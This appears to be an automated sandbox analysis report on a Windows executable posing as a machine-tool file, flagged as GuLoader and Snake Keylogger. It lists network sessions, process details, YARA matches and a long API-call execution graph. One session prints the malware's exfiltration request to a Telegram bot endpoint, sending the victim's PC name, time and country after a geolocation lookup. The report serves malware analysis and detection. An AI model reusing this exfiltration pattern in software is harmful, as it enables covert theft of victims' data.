                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC369INData Raw: 31 36 61 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 49 4c 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 49 6c 6c 69 6e 6f 69 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 43 68 69 63 61 67 6f 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 36 30 36 30 32 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54
                                                                                                                                                                                                                        Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
                                                                                                                                                                                                                        2024-10-07 08:56:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.11.20 | 49719 | 172.67.177.134 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:20 UTC | 63 | OUT | GET /xml/191.96.150.187 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-07 08:56:20 UTC | 676 | IN | HTTP/1.1 200 OK
Date: Mon, 07 Oct 2024 08:56:20 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 5
Last-Modified: Mon, 07 Oct 2024 08:56:15 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YXjjMacnHFyRZ2j6kEs%2FzxMY5AKKg3vxYYrAvZ0ox2lhFL15b%2FTdPopUGs2gOB6PJhM1ROHgGsx5vQmwY%2B0Y%2FkM9mYdeYqxi3XLwyjCjT6E%2BJprSxIQP93P6hftxhWPu0s7peoBB"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8cecad6adef5434c-EWR
2024-10-07 08:56:20 UTC | 369 | IN | Data Ascii: 16a<Response><IP>191.96.150.187</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>IL</RegionCode><RegionName>Illinois</RegionName><City>Chicago</City><ZipCode>60602</ZipCode><TimeZone>America/Chicago</T
2024-10-07 08:56:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.11.20 | 49720 | 149.154.167.220 | 443 | 800 | C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-07 08:56:21 UTC | 349 | OUT | GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:936905%0D%0ADate%20and%20Time:%2007/10/2024%20/%2004:56:19%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20936905%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
2024-10-07 08:56:21 UTC | 344 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Mon, 07 Oct 2024 08:56:21 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-07 08:56:21 UTC | 55 | IN | Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}



Target ID: 0
Start time: 04:55:08
Start date: 07/10/2024
Path: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
Imagebase: 0x400000
File size: 751'715 bytes
MD5 hash: E7EBD3DE4BCBA42FEEE0D2BD98521920
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1493431079.0000000000507000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.1493431079.0000000000515000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1494958612.000000000597D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: true

Target ID: 11
Start time: 04:56:00
Start date: 07/10/2024
Path: C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\SM-0230- J - TOOL 10 DEGREE FOR DWT MACHINE-MF5i.exe"
Imagebase: 0x400000
File size: 751'715 bytes
MD5 hash: E7EBD3DE4BCBA42FEEE0D2BD98521920
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 0000000B.00000002.5968030278.00000000361E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: low
Has exited: false


Execution Graph

Execution Coverage: 19.3%
Dynamic/Decrypted Code Coverage: 14%
Signature Coverage: 23.9%
Total number of Nodes: 1506
Total number of Limit Nodes: 39
402a3a 18 API calls 5052->5053 5054 4021ea 5053->5054 5055 406001 2 API calls 5054->5055 5056 4021f3 5055->5056 5057 402204 lstrlenA lstrlenA 5056->5057 5061 4021f7 5056->5061 5059 404f16 25 API calls 5057->5059 5058 404f16 25 API calls 5062 4021ff 5058->5062 5060 402240 SHFileOperationA 5059->5060 5060->5061 5060->5062 5061->5058 5061->5062 4587 405054 4588 405076 GetDlgItem GetDlgItem GetDlgItem 4587->4588 4589 4051ff 4587->4589 4633 403f17 SendMessageA 4588->4633 4591 405207 GetDlgItem CreateThread CloseHandle 4589->4591 4592 40522f 4589->4592 4591->4592 4636 404fe8 OleInitialize 4591->4636 4594 40525d 4592->4594 4595 405245 ShowWindow ShowWindow 4592->4595 4596 40527e 4592->4596 4593 4050e6 4602 4050ed GetClientRect GetSystemMetrics SendMessageA SendMessageA 4593->4602 4597 405265 4594->4597 4598 4052b8 4594->4598 4635 403f17 SendMessageA 4595->4635 4601 403f49 8 API calls 4596->4601 4599 405291 ShowWindow 4597->4599 4600 40526d 4597->4600 4598->4596 4609 4052c5 SendMessageA 4598->4609 4605 4052b1 4599->4605 4606 4052a3 4599->4606 4604 403ebb SendMessageA 4600->4604 4614 40528a 4601->4614 4607 40515b 4602->4607 4608 40513f SendMessageA SendMessageA 4602->4608 4604->4596 4611 403ebb SendMessageA 4605->4611 4610 404f16 25 API calls 4606->4610 4612 405160 SendMessageA 4607->4612 4613 40516e 4607->4613 4608->4607 4609->4614 4615 4052de CreatePopupMenu 4609->4615 4610->4605 4611->4598 4612->4613 4617 403ee2 19 API calls 4613->4617 4616 405d1f 18 API calls 4615->4616 4619 4052ee AppendMenuA 4616->4619 4618 40517e 4617->4618 4622 405187 ShowWindow 4618->4622 4623 4051bb GetDlgItem SendMessageA 4618->4623 4620 40530c GetWindowRect 4619->4620 4621 40531f TrackPopupMenu 4619->4621 4620->4621 4621->4614 4624 40533b 4621->4624 4625 4051aa 4622->4625 4626 40519d ShowWindow 4622->4626 4623->4614 4627 4051e2 SendMessageA SendMessageA 4623->4627 4628 40535a SendMessageA 4624->4628 4634 403f17 SendMessageA 4625->4634 4626->4625 4627->4614 4628->4628 4629 405377 OpenClipboard 
EmptyClipboard GlobalAlloc GlobalLock 4628->4629 4631 405399 SendMessageA 4629->4631 4631->4631 4632 4053bb GlobalUnlock SetClipboardData CloseClipboard 4631->4632 4632->4614 4633->4593 4634->4623 4635->4594 4637 403f2e SendMessageA 4636->4637 4638 40500b 4637->4638 4641 401389 2 API calls 4638->4641 4642 405032 4638->4642 4639 403f2e SendMessageA 4640 405044 OleUninitialize 4639->4640 4641->4638 4642->4639 5063 402254 5064 40226e 5063->5064 5065 40225b 5063->5065 5066 405d1f 18 API calls 5065->5066 5067 402268 5066->5067 5068 4054f3 MessageBoxIndirectA 5067->5068 5068->5064 4647 4014d6 4648 402a1d 18 API calls 4647->4648 4649 4014dc Sleep 4648->4649 4651 4028cf 4649->4651 4652 4030d9 SetErrorMode GetVersion 4653 403110 4652->4653 4654 403116 4652->4654 4656 406092 5 API calls 4653->4656 4655 406028 3 API calls 4654->4655 4657 40312c 4655->4657 4656->4654 4658 406028 3 API calls 4657->4658 4659 403136 4658->4659 4660 406028 3 API calls 4659->4660 4661 403140 4660->4661 4662 406092 5 API calls 4661->4662 4663 403147 4662->4663 4664 406092 5 API calls 4663->4664 4665 40314e #17 OleInitialize SHGetFileInfoA 4664->4665 4743 405cfd lstrcpynA 4665->4743 4667 40318b GetCommandLineA 4744 405cfd lstrcpynA 4667->4744 4669 40319d GetModuleHandleA 4670 4031b4 4669->4670 4671 40579a CharNextA 4670->4671 4672 4031c8 CharNextA 4671->4672 4678 4031d8 4672->4678 4673 4032a2 4674 4032b5 GetTempPathA 4673->4674 4745 4030a8 4674->4745 4676 4032cd 4679 4032d1 GetWindowsDirectoryA lstrcatA 4676->4679 4680 403327 DeleteFileA 4676->4680 4677 40579a CharNextA 4677->4678 4678->4673 4678->4677 4684 4032a4 4678->4684 4682 4030a8 12 API calls 4679->4682 4755 402c66 GetTickCount GetModuleFileNameA 4680->4755 4683 4032ed 4682->4683 4683->4680 4686 4032f1 GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 4683->4686 4839 405cfd lstrcpynA 4684->4839 4685 40333b 4687 4033d1 4685->4687 4690 4033c1 4685->4690 4694 40579a CharNextA 4685->4694 4689 4030a8 12 API calls 4686->4689 4842 
4035a3 4687->4842 4692 40331f 4689->4692 4783 40367d 4690->4783 4692->4680 4692->4687 4696 403356 4694->4696 4705 403401 4696->4705 4706 40339c 4696->4706 4697 403509 4699 403511 GetCurrentProcess OpenProcessToken 4697->4699 4700 40358b ExitProcess 4697->4700 4698 4033eb 4701 4054f3 MessageBoxIndirectA 4698->4701 4702 40355c 4699->4702 4703 40352c LookupPrivilegeValueA AdjustTokenPrivileges 4699->4703 4707 4033f9 ExitProcess 4701->4707 4710 406092 5 API calls 4702->4710 4703->4702 4709 405476 5 API calls 4705->4709 4708 40585d 18 API calls 4706->4708 4711 4033a7 4708->4711 4712 403406 lstrcatA 4709->4712 4713 403563 4710->4713 4711->4687 4840 405cfd lstrcpynA 4711->4840 4714 403422 lstrcatA lstrcmpiA 4712->4714 4715 403417 lstrcatA 4712->4715 4716 403578 ExitWindowsEx 4713->4716 4719 403584 4713->4719 4714->4687 4718 40343e 4714->4718 4715->4714 4716->4700 4716->4719 4721 403443 4718->4721 4722 40344a 4718->4722 4723 40140b 2 API calls 4719->4723 4720 4033b6 4841 405cfd lstrcpynA 4720->4841 4725 4053dc 4 API calls 4721->4725 4726 405459 2 API calls 4722->4726 4723->4700 4727 403448 4725->4727 4728 40344f SetCurrentDirectoryA 4726->4728 4727->4728 4729 403469 4728->4729 4730 40345e 4728->4730 4850 405cfd lstrcpynA 4729->4850 4849 405cfd lstrcpynA 4730->4849 4733 405d1f 18 API calls 4734 4034a8 DeleteFileA 4733->4734 4735 4034b5 CopyFileA 4734->4735 4740 403477 4734->4740 4735->4740 4736 4034fd 4738 405bb8 38 API calls 4736->4738 4737 405bb8 38 API calls 4737->4740 4738->4687 4739 405d1f 18 API calls 4739->4740 4740->4733 4740->4736 4740->4737 4740->4739 4742 4034e9 CloseHandle 4740->4742 4851 40548e CreateProcessA 4740->4851 4742->4740 4743->4667 4744->4669 4746 405f68 5 API calls 4745->4746 4747 4030b4 4746->4747 4748 4030be 4747->4748 4749 40576f 3 API calls 4747->4749 4748->4676 4750 4030c6 4749->4750 4751 405459 2 API calls 4750->4751 4752 4030cc 4751->4752 4854 40599f 4752->4854 4858 405970 GetFileAttributesA CreateFileA 4755->4858 4757 402ca6 4775 402cb6 
4757->4775 4859 405cfd lstrcpynA 4757->4859 4759 402ccc 4760 4057b6 2 API calls 4759->4760 4761 402cd2 4760->4761 4860 405cfd lstrcpynA 4761->4860 4763 402cdd GetFileSize 4768 402cf4 4763->4768 4780 402dd9 4763->4780 4765 402de2 4767 402e12 GlobalAlloc 4765->4767 4765->4775 4873 403091 SetFilePointer 4765->4873 4766 40307b ReadFile 4766->4768 4872 403091 SetFilePointer 4767->4872 4768->4766 4770 402e45 4768->4770 4768->4775 4779 402c02 6 API calls 4768->4779 4768->4780 4772 402c02 6 API calls 4770->4772 4772->4775 4773 402dfb 4776 40307b ReadFile 4773->4776 4774 402e2d 4777 402e9f 36 API calls 4774->4777 4775->4685 4778 402e06 4776->4778 4781 402e39 4777->4781 4778->4767 4778->4775 4779->4768 4861 402c02 4780->4861 4781->4775 4781->4781 4782 402e76 SetFilePointer 4781->4782 4782->4775 4784 406092 5 API calls 4783->4784 4785 403691 4784->4785 4786 403697 4785->4786 4787 4036a9 4785->4787 4887 405c5b wsprintfA 4786->4887 4788 405be4 3 API calls 4787->4788 4789 4036d4 4788->4789 4791 4036f2 lstrcatA 4789->4791 4793 405be4 3 API calls 4789->4793 4792 4036a7 4791->4792 4878 403942 4792->4878 4793->4791 4796 40585d 18 API calls 4797 403724 4796->4797 4798 4037ad 4797->4798 4800 405be4 3 API calls 4797->4800 4799 40585d 18 API calls 4798->4799 4801 4037b3 4799->4801 4802 403750 4800->4802 4803 4037c3 LoadImageA 4801->4803 4804 405d1f 18 API calls 4801->4804 4802->4798 4807 40376c lstrlenA 4802->4807 4811 40579a CharNextA 4802->4811 4805 403869 4803->4805 4806 4037ea RegisterClassA 4803->4806 4804->4803 4810 40140b 2 API calls 4805->4810 4808 403820 SystemParametersInfoA CreateWindowExA 4806->4808 4809 403873 4806->4809 4812 4037a0 4807->4812 4813 40377a lstrcmpiA 4807->4813 4808->4805 4809->4687 4814 40386f 4810->4814 4816 40376a 4811->4816 4815 40576f 3 API calls 4812->4815 4813->4812 4817 40378a GetFileAttributesA 4813->4817 4814->4809 4818 403942 19 API calls 4814->4818 4819 4037a6 4815->4819 4816->4807 4820 403796 4817->4820 4822 403880 4818->4822 4888 405cfd 
lstrcpynA 4819->4888 4820->4812 4821 4057b6 2 API calls 4820->4821 4821->4812 4824 40388c ShowWindow 4822->4824 4825 40390f 4822->4825 4827 406028 3 API calls 4824->4827 4826 404fe8 5 API calls 4825->4826 4828 403915 4826->4828 4829 4038a4 4827->4829 4830 403931 4828->4830 4831 403919 4828->4831 4832 4038b2 GetClassInfoA 4829->4832 4834 406028 3 API calls 4829->4834 4833 40140b 2 API calls 4830->4833 4831->4809 4837 40140b 2 API calls 4831->4837 4835 4038c6 GetClassInfoA RegisterClassA 4832->4835 4836 4038dc DialogBoxParamA 4832->4836 4833->4809 4834->4832 4835->4836 4838 40140b 2 API calls 4836->4838 4837->4809 4838->4809 4839->4674 4840->4720 4841->4690 4843 4035bb 4842->4843 4844 4035ad CloseHandle 4842->4844 4890 4035e8 4843->4890 4844->4843 4847 40559f 69 API calls 4848 4033da OleUninitialize 4847->4848 4848->4697 4848->4698 4849->4729 4850->4740 4852 4054c1 CloseHandle 4851->4852 4853 4054cd 4851->4853 4852->4853 4853->4740 4855 4059aa GetTickCount GetTempFileNameA 4854->4855 4856 4030d7 4855->4856 4857 4059d7 4855->4857 4856->4676 4857->4855 4857->4856 4858->4757 4859->4759 4860->4763 4862 402c23 4861->4862 4863 402c0b 4861->4863 4864 402c33 GetTickCount 4862->4864 4865 402c2b 4862->4865 4866 402c14 DestroyWindow 4863->4866 4867 402c1b 4863->4867 4869 402c41 CreateDialogParamA ShowWindow 4864->4869 4870 402c64 4864->4870 4874 4060ce 4865->4874 4866->4867 4867->4765 4869->4870 4870->4765 4872->4774 4873->4773 4875 4060eb PeekMessageA 4874->4875 4876 4060e1 DispatchMessageA 4875->4876 4877 402c31 4875->4877 4876->4875 4877->4765 4879 403956 4878->4879 4889 405c5b wsprintfA 4879->4889 4881 4039c7 4882 405d1f 18 API calls 4881->4882 4883 4039d3 SetWindowTextA 4882->4883 4884 403702 4883->4884 4885 4039ef 4883->4885 4884->4796 4885->4884 4886 405d1f 18 API calls 4885->4886 4886->4885 4887->4792 4888->4798 4889->4881 4891 4035f6 4890->4891 4892 4035c0 4891->4892 4893 4035fb FreeLibrary GlobalFree 4891->4893 4892->4847 4893->4892 4893->4893 5069 4042d9 5070 4042e9 
5069->5070 5071 40430f 5069->5071 5072 403ee2 19 API calls 5070->5072 5073 403f49 8 API calls 5071->5073 5074 4042f6 SetDlgItemTextA 5072->5074 5075 40431b 5073->5075 5074->5071 5076 1000161a 5077 10001649 5076->5077 5078 10001a5d 18 API calls 5077->5078 5079 10001650 5078->5079 5080 10001663 5079->5080 5081 10001657 5079->5081 5083 1000168a 5080->5083 5084 1000166d 5080->5084 5082 10001266 2 API calls 5081->5082 5087 10001661 5082->5087 5085 10001690 5083->5085 5086 100016b4 5083->5086 5088 100014e2 3 API calls 5084->5088 5090 10001559 3 API calls 5085->5090 5091 100014e2 3 API calls 5086->5091 5089 10001672 5088->5089 5092 10001559 3 API calls 5089->5092 5093 10001695 5090->5093 5091->5087 5094 10001678 5092->5094 5095 10001266 2 API calls 5093->5095 5096 10001266 2 API calls 5094->5096 5097 1000169b GlobalFree 5095->5097 5098 1000167e GlobalFree 5096->5098 5097->5087 5099 100016af GlobalFree 5097->5099 5098->5087 5099->5087 5100 40155b 5101 402877 5100->5101 5104 405c5b wsprintfA 5101->5104 5103 40287c 5104->5103 5105 40255c 5106 402a1d 18 API calls 5105->5106 5112 402566 5106->5112 5107 4025d0 5108 4059e8 ReadFile 5108->5112 5109 4025d2 5114 405c5b wsprintfA 5109->5114 5111 4025e2 5111->5107 5113 4025f8 SetFilePointer 5111->5113 5112->5107 5112->5108 5112->5109 5112->5111 5113->5107 5114->5107 5115 40205e 5116 402a3a 18 API calls 5115->5116 5117 402065 5116->5117 5118 402a3a 18 API calls 5117->5118 5119 40206f 5118->5119 5120 402a3a 18 API calls 5119->5120 5121 402079 5120->5121 5122 402a3a 18 API calls 5121->5122 5123 402083 5122->5123 5124 402a3a 18 API calls 5123->5124 5125 40208d 5124->5125 5126 4020cc CoCreateInstance 5125->5126 5127 402a3a 18 API calls 5125->5127 5130 4020eb 5126->5130 5132 402193 5126->5132 5127->5126 5128 401423 25 API calls 5129 4021c9 5128->5129 5131 402173 MultiByteToWideChar 5130->5131 5130->5132 5131->5132 5132->5128 5132->5129 5133 40265e 5134 402664 5133->5134 5135 402668 FindNextFileA 5134->5135 5137 40267a 5134->5137 5136 
4026b9 5135->5136 5135->5137 5139 405cfd lstrcpynA 5136->5139 5139->5137 5140 401cde GetDlgItem GetClientRect 5141 402a3a 18 API calls 5140->5141 5142 401d0e LoadImageA SendMessageA 5141->5142 5143 401d2c DeleteObject 5142->5143 5144 4028cf 5142->5144 5143->5144 5145 401662 5146 402a3a 18 API calls 5145->5146 5147 401669 5146->5147 5148 402a3a 18 API calls 5147->5148 5149 401672 5148->5149 5150 402a3a 18 API calls 5149->5150 5151 40167b MoveFileA 5150->5151 5152 401687 5151->5152 5153 40168e 5151->5153 5154 401423 25 API calls 5152->5154 5155 406001 2 API calls 5153->5155 5157 4021c9 5153->5157 5154->5157 5156 40169d 5155->5156 5156->5157 5158 405bb8 38 API calls 5156->5158 5158->5152 3992 402364 3993 40236a 3992->3993 3994 402a3a 18 API calls 3993->3994 3995 40237c 3994->3995 3996 402a3a 18 API calls 3995->3996 3997 402386 RegCreateKeyExA 3996->3997 3998 4023b0 3997->3998 3999 4026a6 3997->3999 4000 402a3a 18 API calls 3998->4000 4002 4023c8 3998->4002 4003 4023c1 lstrlenA 4000->4003 4001 4023d4 4005 4023ef RegSetValueExA 4001->4005 4009 402e9f 4001->4009 4002->4001 4030 402a1d 4002->4030 4003->4002 4007 402405 RegCloseKey 4005->4007 4007->3999 4011 402eb5 4009->4011 4010 402ee0 4033 40307b 4010->4033 4011->4010 4056 403091 SetFilePointer 4011->4056 4015 403005 4015->4005 4016 40301b 4018 40301f 4016->4018 4022 403037 4016->4022 4017 402efd GetTickCount 4025 402f10 4017->4025 4019 40307b ReadFile 4018->4019 4019->4015 4020 40307b ReadFile 4020->4022 4021 40307b ReadFile 4021->4025 4022->4015 4022->4020 4023 405a17 WriteFile 4022->4023 4023->4022 4025->4015 4025->4021 4026 402f76 GetTickCount 4025->4026 4027 402f9f MulDiv wsprintfA 4025->4027 4036 406195 4025->4036 4054 405a17 WriteFile 4025->4054 4026->4025 4043 404f16 4027->4043 4031 405d1f 18 API calls 4030->4031 4032 402a31 4031->4032 4032->4001 4057 4059e8 ReadFile 4033->4057 4037 4061ba 4036->4037 4038 4061c2 4036->4038 4037->4025 4038->4037 4039 406252 GlobalAlloc 4038->4039 4040 406249 GlobalFree 4038->4040 
4041 4062c0 GlobalFree 4038->4041 4042 4062c9 GlobalAlloc 4038->4042 4039->4037 4039->4038 4040->4039 4041->4042 4042->4037 4042->4038 4044 404f31 4043->4044 4053 404fd4 4043->4053 4045 404f4e lstrlenA 4044->4045 4048 405d1f 18 API calls 4044->4048 4046 404f77 4045->4046 4047 404f5c lstrlenA 4045->4047 4050 404f8a 4046->4050 4051 404f7d SetWindowTextA 4046->4051 4049 404f6e lstrcatA 4047->4049 4047->4053 4048->4045 4049->4046 4052 404f90 SendMessageA SendMessageA SendMessageA 4050->4052 4050->4053 4051->4050 4052->4053 4053->4025 4055 405a35 4054->4055 4055->4025 4056->4010 4058 402eeb 4057->4058 4058->4015 4058->4016 4058->4017 4059 401567 4060 401577 ShowWindow 4059->4060 4061 40157e 4059->4061 4060->4061 4062 40158c ShowWindow 4061->4062 4063 4028cf 4061->4063 4062->4063 5166 401dea 5167 402a3a 18 API calls 5166->5167 5168 401df0 5167->5168 5169 402a3a 18 API calls 5168->5169 5170 401df9 5169->5170 5171 402a3a 18 API calls 5170->5171 5172 401e02 5171->5172 5173 402a3a 18 API calls 5172->5173 5174 401e0b 5173->5174 5175 401423 25 API calls 5174->5175 5176 401e12 ShellExecuteA 5175->5176 5177 401e3f 5176->5177 5178 401eee 5179 402a3a 18 API calls 5178->5179 5180 401ef5 5179->5180 5181 406092 5 API calls 5180->5181 5182 401f04 5181->5182 5183 401f1c GlobalAlloc 5182->5183 5184 401f84 5182->5184 5183->5184 5185 401f30 5183->5185 5186 406092 5 API calls 5185->5186 5187 401f37 5186->5187 5188 406092 5 API calls 5187->5188 5189 401f41 5188->5189 5189->5184 5193 405c5b wsprintfA 5189->5193 5191 401f78 5194 405c5b wsprintfA 5191->5194 5193->5191 5194->5184 5195 4014f0 SetForegroundWindow 5196 4028cf 5195->5196 5197 404671 5198 404681 5197->5198 5199 40469d 5197->5199 5208 4054d7 GetDlgItemTextA 5198->5208 5201 4046d0 5199->5201 5202 4046a3 SHGetPathFromIDListA 5199->5202 5204 4046ba SendMessageA 5202->5204 5205 4046b3 5202->5205 5203 40468e SendMessageA 5203->5199 5204->5201 5206 40140b 2 API calls 5205->5206 5206->5204 5208->5203 5209 100015b3 5210 100014bb GlobalFree 
5209->5210 5212 100015cb 5210->5212 5211 10001611 GlobalFree 5212->5211 5213 100015e6 5212->5213 5214 100015fd VirtualFree 5212->5214 5213->5211 5214->5211 5220 4018f5 5221 40192c 5220->5221 5222 402a3a 18 API calls 5221->5222 5223 401931 5222->5223 5224 40559f 69 API calls 5223->5224 5225 40193a 5224->5225 5226 403ff6 lstrcpynA lstrlenA 5227 4024f7 5228 402a3a 18 API calls 5227->5228 5229 4024fe 5228->5229 5232 405970 GetFileAttributesA CreateFileA 5229->5232 5231 40250a 5232->5231 5233 4018f8 5234 402a3a 18 API calls 5233->5234 5235 4018ff 5234->5235 5236 4054f3 MessageBoxIndirectA 5235->5236 5237 401908 5236->5237 5252 1000103d 5253 1000101b 5 API calls 5252->5253 5254 10001056 5253->5254 5255 4014fe 5256 401506 5255->5256 5258 401519 5255->5258 5257 402a1d 18 API calls 5256->5257 5257->5258 5259 402b7f 5260 402ba7 5259->5260 5261 402b8e SetTimer 5259->5261 5262 402bfc 5260->5262 5263 402bc1 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5260->5263 5261->5260 5263->5262 5264 401000 5265 401037 BeginPaint GetClientRect 5264->5265 5266 40100c DefWindowProcA 5264->5266 5267 4010f3 5265->5267 5271 401179 5266->5271 5269 401073 CreateBrushIndirect FillRect DeleteObject 5267->5269 5270 4010fc 5267->5270 5269->5267 5272 401102 CreateFontIndirectA 5270->5272 5273 401167 EndPaint 5270->5273 5272->5273 5274 401112 6 API calls 5272->5274 5273->5271 5274->5273 5282 401b02 5283 402a3a 18 API calls 5282->5283 5284 401b09 5283->5284 5285 402a1d 18 API calls 5284->5285 5286 401b12 wsprintfA 5285->5286 5287 4028cf 5286->5287 5288 402482 5289 402b44 19 API calls 5288->5289 5290 40248c 5289->5290 5291 402a1d 18 API calls 5290->5291 5292 402495 5291->5292 5293 4024b8 RegEnumValueA 5292->5293 5294 4024ac RegEnumKeyA 5292->5294 5296 4026a6 5292->5296 5295 4024d1 RegCloseKey 5293->5295 5293->5296 5294->5295 5295->5296 3931 401a03 3937 402a3a 3931->3937 3934 401a20 3935 401a25 lstrcmpA 3934->3935 3936 401a33 3934->3936 3935->3936 3938 402a46 3937->3938 3943 405d1f 3938->3943 3941 
401a0c ExpandEnvironmentStringsA 3941->3934 3941->3936 3948 405d2c 3943->3948 3944 405f4f 3945 402a67 3944->3945 3977 405cfd lstrcpynA 3944->3977 3945->3941 3961 405f68 3945->3961 3947 405dcd GetVersion 3947->3948 3948->3944 3948->3947 3949 405f26 lstrlenA 3948->3949 3952 405d1f 10 API calls 3948->3952 3954 405e45 GetSystemDirectoryA 3948->3954 3955 405e58 GetWindowsDirectoryA 3948->3955 3956 405f68 5 API calls 3948->3956 3957 405e8c SHGetSpecialFolderLocation 3948->3957 3958 405d1f 10 API calls 3948->3958 3959 405ecf lstrcatA 3948->3959 3970 405be4 RegOpenKeyExA 3948->3970 3975 405c5b wsprintfA 3948->3975 3976 405cfd lstrcpynA 3948->3976 3949->3948 3952->3949 3954->3948 3955->3948 3956->3948 3957->3948 3960 405ea4 SHGetPathFromIDListA CoTaskMemFree 3957->3960 3958->3948 3959->3948 3960->3948 3962 405f74 3961->3962 3964 405fd1 CharNextA 3962->3964 3967 405fdc 3962->3967 3968 405fbf CharNextA 3962->3968 3969 405fcc CharNextA 3962->3969 3978 40579a 3962->3978 3963 405fe0 CharPrevA 3963->3967 3964->3962 3964->3967 3965 405ffb 3965->3941 3967->3963 3967->3965 3968->3962 3969->3964 3971 405c55 3970->3971 3972 405c17 RegQueryValueExA 3970->3972 3971->3948 3973 405c38 RegCloseKey 3972->3973 3973->3971 3975->3948 3976->3948 3977->3945 3979 4057a0 3978->3979 3980 4057b3 3979->3980 3981 4057a6 CharNextA 3979->3981 3980->3962 3981->3979 3982 402283 3983 40228b 3982->3983 3988 402291 3982->3988 3984 402a3a 18 API calls 3983->3984 3984->3988 3985 402a3a 18 API calls 3987 4022a1 3985->3987 3986 4022af 3990 402a3a 18 API calls 3986->3990 3987->3986 3989 402a3a 18 API calls 3987->3989 3988->3985 3988->3987 3989->3986 3991 4022b8 WritePrivateProfileStringA 3990->3991 5298 100029c3 5299 100029db 5298->5299 5300 10001534 2 API calls 5299->5300 5301 100029f6 5300->5301 5302 402308 5303 402338 5302->5303 5304 40230d 5302->5304 5305 402a3a 18 API calls 5303->5305 5306 402b44 19 API calls 5304->5306 5308 40233f 5305->5308 5307 402314 5306->5307 5309 402a3a 18 API calls 5307->5309 5312 
